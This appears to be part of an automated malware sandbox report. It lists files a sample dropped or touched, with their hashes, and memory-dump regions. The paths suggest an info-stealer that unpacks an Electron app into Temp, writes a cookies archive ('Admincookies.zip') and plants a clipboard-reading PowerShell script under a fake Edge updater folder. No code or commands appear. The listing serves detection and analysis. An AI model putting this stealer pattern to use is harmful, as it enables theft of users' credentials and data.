| SHA256 | 3a4898ab01ac79e217e556111e6e4bc61d0b24c7c7539fb2815e2c292b19a1e8 |
| SHA512 | af2fe9791efc5e171284703e17e81a965e14fcf4b4fc324e398acd0bac5905b5c52f86558d2ff80b5457c774a577582004b3ef859cfd37a44d5494fab5984db9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4c9c11caab0eaca4889e0dd846f57c8d |
| SHA1 | 4a113a7284b5756d52ceebfc2efc240d67554e9e |
| SHA256 | a642e559b02631d87dfce692e9aaccd95819caed117f1189075e19c2aa3512b9 |
| SHA512 | 90ad83580e5aaf48c97b964a7eb0bd45cbff2005226da2f3c7ef791bddd451ae2f19f2e1f930f6be86cb89d593d0d801277965c4ab1a709ea9ea507d7c8602d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\19b92e1a-15d2-4c13-b8b5-71d1523d3694\0
| MD5 | 30811a867714798da9920e671f74e2fe |
| SHA1 | e70fd100fa7c33ad53346e2df29e640009736144 |
| SHA256 | 04550d54fdf7e6cda6c3bc912af8e1a21469d0b1a8fe19e399ab2a10271340ba |
| SHA512 | 0a993b52317d9902e82e54984f1077dfd45ec4f526b308e83f1be71ca6d4e18cdf30e033a9bdde1dbae681551058649bfcd35825ffc79df0c540a4ca9c8a39cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1dce74c7b382d0b00137451d289d6bdf |
| SHA1 | 0b93140a1e70aa296dd9bff1c2e5ba8ee88b6e59 |
| SHA256 | 2c6007d9db0d804f185ef27b22ab7f5e3f9ab4bf783b73b16054f11787be1857 |
| SHA512 | d7220649ac1fa4d4ed34c90ac3ff879c67ce82609dab97b1bfc3f7a8917200c7e1a4e7d0e4755d30ed0dbe5225ad368ec54b4db555fd68285f5bdafae71f9bc1 |
C:\Users\Admin\AppData\Local\Temp\nsdF30C.tmp\System.dll
| MD5 | 75ed96254fbf894e42058062b4b4f0d1 |
| SHA1 | 996503f1383b49021eb3427bc28d13b5bbd11977 |
| SHA256 | a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7 |
| SHA512 | 58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4 |
C:\Users\Admin\AppData\Local\Temp\nsdF30C.tmp\nsis7z.dll
| MD5 | c6a070b3e68b292bb0efc9b26e85e9cc |
| SHA1 | 5a922b96eda6595a68fd0a9051236162ff2e2ada |
| SHA256 | 66ac8bd1f273a73e17a3f31d6add739d3cb0330a6417faeda11a9cae00b62d8b |
| SHA512 | 8eff8fc16f5bb574bd9483e3b217b67a8986e31497368c06fdaa3a1e93a40aee94a5b31729d01905157b0ae1e556a402f43cd29a4d30a0587e1ec334458a44e8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3f9a367beb8981981644e8d1615bf4e5 |
| SHA1 | 2db23a40ec0b63c0c1e5a76e05e1c611a1216ff8 |
| SHA256 | 0237e2b34453ca4b8623cae9910da211c3c16edd758cd1f67f60f82b49146995 |
| SHA512 | 8c91254f5ea723bcd26e73289b9d6aecaf998b6f65faf795b10c905a95740bdf6ada41c096defffee9db791360ee2c64c4b98e4755a90e5e15e9c9d8a3194367 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | dd4d0343465c2cdb7fa3db2249ae5e18 |
| SHA1 | 6dde3f88ac91e153699652bebe5b0297c6279443 |
| SHA256 | 549c8702c94c7fb6a6750b085f83eb168bc58d9f74823f7d2ca7254a25e8e4ee |
| SHA512 | 2bfd70725b7e7937b2eec1513c96f9ffe71b1f600a834d1b1189f6f5c1498787a2eb55048279ec3ff98b83ab47bb94b0776d3d26a17a822f3c3a216f5b35e040 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0311113cf4da7fb8eb02b152dea4f42d |
| SHA1 | 844d371658417343c2bd3bf531389ef34f59d2c8 |
| SHA256 | 571c3f86c1a2e9348c2d5a912de2adf6a549c651c15db503aac848ac403dd785 |
| SHA512 | 792fe70589d01e8a46b50261040c12d18121bef1f304dbba06e6b696bb3e123bc03ae89fde25dce7b4ab40d997cc7ed4ed4a2d9aa23b89921bd639b019621966 |
C:\Users\Admin\AppData\Local\Temp\nsdF30C.tmp\StdUtils.dll
| MD5 | 33b4e69e7835e18b9437623367dd1787 |
| SHA1 | 53afa03edaf931abdc2d828e5a2c89ad573d926c |
| SHA256 | 72d38ef115e71fc73dc5978987c583fc8c6b50ff12e4a5d30649a4d164a8b6ae |
| SHA512 | ca890e785d1a0a7e0b4a748416fba417826ae66b46e600f407d4e795b444612a8b830f579f2cf5b6e051bea800604f34f8801cc3daf05c8d29ad05bcda454a77 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ffmpeg.dll
| MD5 | eabfc10d56cb44a86493cb2f8ca7aab2 |
| SHA1 | 09d7e87f43527333cd021329d6c2f4e8bd8ddab5 |
| SHA256 | 42a2a996ac433ac33a22776b8418a82753557093d90147b7951138b5c83924b6 |
| SHA512 | ee31e3539fba9e5969a9f38c428f586de2dd7630cb5d8c5e3c2c934b5881f8176b8ab6ef6397c1ce4fa6ccf3ee9615225c7afa0e0b28c6fc23974e8b96625dec |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\icudtl.dat
| MD5 | ad2988770b8cb3281a28783ad833a201 |
| SHA1 | 94b7586ee187d9b58405485f4c551b55615f11b5 |
| SHA256 | df876c7af43ed93eec6aea4d2d55c805009c219653cdeb368f1d048f4922b108 |
| SHA512 | f27e542a9c6c60fa28c5b7cc2818079341ef93aef3bbcadecad2dc11aff5b1592b19c7ebfa543ea42a3cbfec26a668641b255545fb0912056e25e852c2dedd01 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\v8_context_snapshot.bin
| MD5 | c2208c06c8ff81bca3c092cc42b8df1b |
| SHA1 | f7b9faa9ba0e72d062f68642a02cc8f3fed49910 |
| SHA256 | 4a67de195878d290f49b503b83e415917b8bbcbd9936b07a5d33b48e9bc6e0a3 |
| SHA512 | 6c3c370dd086a976c44d4059a315bd3bcbb50961aa34734e65a40d861cffca9090d47cec74575afe23952e394e4845bda2d8798eebe01fb54a7a6288bce238f5 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\resources\app.asar
| MD5 | 9fc83d8c2973e2b71a40fa3d9a645d24 |
| SHA1 | e8de86beee4a3373337420922a9e2d03f2006199 |
| SHA256 | 6ee130d45c67311acd315bb7b1390df04bb0350a879f602f88d91b127334b81c |
| SHA512 | 050349ac8cafe1624109f78f7bc4a33a9f8214e02c8e63acac6fade250761513111e1fc3fadc1f0e53703a91ec354522179483b91a382eeab14bbd5b4969867b |
C:\Users\Admin\AppData\Local\Temp\322e9e6d-ee25-44ea-bd6f-3d5c628588d3.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
memory/4240-479-0x0000024DFD230000-0x0000024DFD252000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgtkc5ac.tto.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.cmdline
| MD5 | 480d73fc203aed5a5a4740ce8d4bcbde |
| SHA1 | d284a70a0ce0d33d8ba95309f70a1e9e5ac61593 |
| SHA256 | 9d54cf8f0f71b0a8195b69859260cf80a1cc937dfcdced34ff3c44b5441cecac |
| SHA512 | 726a0e3da9398cd55429603b690b4c5cf637a88c55febfbec3fd827d85076618966bbc2d26ea6f73561217fd718a09acbddc380aeba08480f16628652d5fddc6 |
\??\c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\CSCAF1169F8BF2242AC91B3FE317EABC15.TMP
| MD5 | e181531d342929cb92adc9150c72e665 |
| SHA1 | d00eac09b472ca04fe52160e350701d72e145925 |
| SHA256 | 35d28050d16f66ba0028ee79f4ab9d0e12332f9befb9a451b67c84615c4ea5b5 |
| SHA512 | 1436ed5148c3eee08f5286f58dc0184c8c6de7af5ac2dc0ddabe9968846ed8721fa1004a386e54c012bcb06e756b53a77063dc189c7d043bc7fdd13f932b8afc |
C:\Users\Admin\AppData\Local\Temp\RES126A.tmp
| MD5 | d5822bb2dedce6a6bf6e7f76b11523c5 |
| SHA1 | 2eec652e1f421f28d92dfd348e48c8c8f6df3ef4 |
| SHA256 | 18c55f2b862b825f47269c7897e672af5456a6f3ed7da32c7a86f85e948cad86 |
| SHA512 | 28c90ba0b45e40d414551eec78ed279dfb6d61c1cf697953eae798c0c45104f8445d4a04db6d3ee877c719637861e57205ad0e4cb57c8c93d3799d10151ba403 |
C:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.dll
| MD5 | 65b2d9ea704be13dbca6116065899068 |
| SHA1 | a778effdec8ea2ebf79ce39145fdf9edca42e2d4 |
| SHA256 | 48a4ee17570b0a1bbbb0c01c9b2e4e35973a56e5bd0516ef516ee674da679c40 |
| SHA512 | 7006223d576218615ee6162be058d154045ecfb11be97d71c4f1687accd718ae22049212bd820ebaec877aa091702ec4f5f1da0679f037223f3fc2c5c167b8a9 |
memory/4240-513-0x0000024DFD1A0000-0x0000024DFD1A8000-memory.dmp
memory/3836-525-0x00000221BEDC0000-0x00000221BEE10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e86a2f4d6dec82df96431112380a87e6 |
| SHA1 | 2dc61fae82770528bee4fe5733a8ac3396012e79 |
| SHA256 | dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a |
| SHA512 | 5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log
| MD5 | aad33910d78c7b9ecd22d016baa5fbb3 |
| SHA1 | 61a77f78e842640ca1c4aa9c6beb3b9a733f10b1 |
| SHA256 | 7170cc7b8c0b3ed6319d2aa5c71a725b9d8c102f046a40eefc2a3d90d6cd737c |
| SHA512 | ac6ae459f1c50a56ea7187f016ff7b21931e4cdd1e94bff5af3baeda87052555b24e982315c1fc26bdd6561a3cfb682ff42d5a7a51518c50aca5dd24e51698a0 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\chrome_200_percent.pak
| MD5 | 57c27201e7cd33471da7ec205fe9973c |
| SHA1 | a8e7bce09c4cbdae2797611b2be8aeb5491036f9 |
| SHA256 | dd8146b2ee289e4d54a4a0f1fd3b2f61b979c6a2baaba96a406d96c3f4fdb33b |
| SHA512 | 57258aa169bec66abf0f45a3e026bb68751fb970b74bd0cb465607fa3b2a89967e832d92d8f675f0449bb6662fcb7786d05f0597124cc8e18bb99a47245779b4 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\resources.pak
| MD5 | d13873f6fb051266deb3599b14535806 |
| SHA1 | 143782c0ce5a5773ae0aae7a22377c8a6d18a5b2 |
| SHA256 | 7b953443e3cd54a0a4775528b52fbfe5ebecbc2c71731600ed0999d227969506 |
| SHA512 | 1ab38fcb70d1958c74da2493459532b52a04b884009509a1ac8dd39f6e9e670658a52f4d19ef57f1bc71dccfdd6ceedbc18034bbcad0b500d75a97c74aac6939 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\locales\en-US.pak
| MD5 | bd8f7b719110342b7cefb16ddd05ec55 |
| SHA1 | 82a79aeaa1dd4b1464b67053ba1766a4498c13e7 |
| SHA256 | d1d3f892be16329c79f9a8ee8c5fa1c9fb46d17edfeb56a3d9407f9d7587a0de |
| SHA512 | 7cd1493e59e87c70927e66769eb200f79a57e1eb1223af4eb4064088571893d3e32cbc4b5ece568fd308992aad65684aa280dc9834f2b5d327bdee514b046e5e |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\chrome_100_percent.pak
| MD5 | 06baf0ad34e0231bd76651203dba8326 |
| SHA1 | a5f99ecdcc06dec9d7f9ce0a8c66e46969117391 |
| SHA256 | 5ae14147992a92548bcad76867dd88cdfcdb69d951c8720920cce6fb135e3189 |
| SHA512 | aff6616e56781ebb925a0ca146245ad3b2827250b32261c0c7c0d5b10b20a343a17fc3761c95d93104163e77b2eae3f1f9cbd3cb2b377f49b42bea39bdd09b91 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
memory/1112-560-0x00007FFA2B540000-0x00007FFA2B541000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\D3DCompiler_47.dll
| MD5 | 7641e39b7da4077084d2afe7c31032e0 |
| SHA1 | 2256644f69435ff2fee76deb04d918083960d1eb |
| SHA256 | 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47 |
| SHA512 | 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5 |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\libGLESv2.dll
| MD5 | bc45db0195aa369cc3c572e4e9eefc7e |
| SHA1 | b880ca4933656be52f027028af5ef8a3b7e07e97 |
| SHA256 | a81729fd6ee2d64dfc47501a1d53794cdeee5c1daa3751f7554aea2503686d10 |
| SHA512 | dd8c39947e7d767fbdccf90c5b3eaedf3937b43c55200d2199107333b63ac09e5356c286618874fac841e1357dd927e0c70b5066c1feeedd8cc6c0fba605ee5f |
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\libegl.dll
| MD5 | 660a9ae1282e6205fc0a51e64470eb5b |
| SHA1 | f91a9c9559f51a8f33a552f0145ed9e706909de8 |
| SHA256 | f2a841b6ef320f226965c7cb01fbc4709fc31425e490a3edfa20147ce3656c85 |
| SHA512 | 20bed2bed042033e3d8b077f9d66bce67922aaec180cc3777f20560219226b7efc73932bb87445afda4e3877472ddcd307215d23954cd082051437e5f2224263 |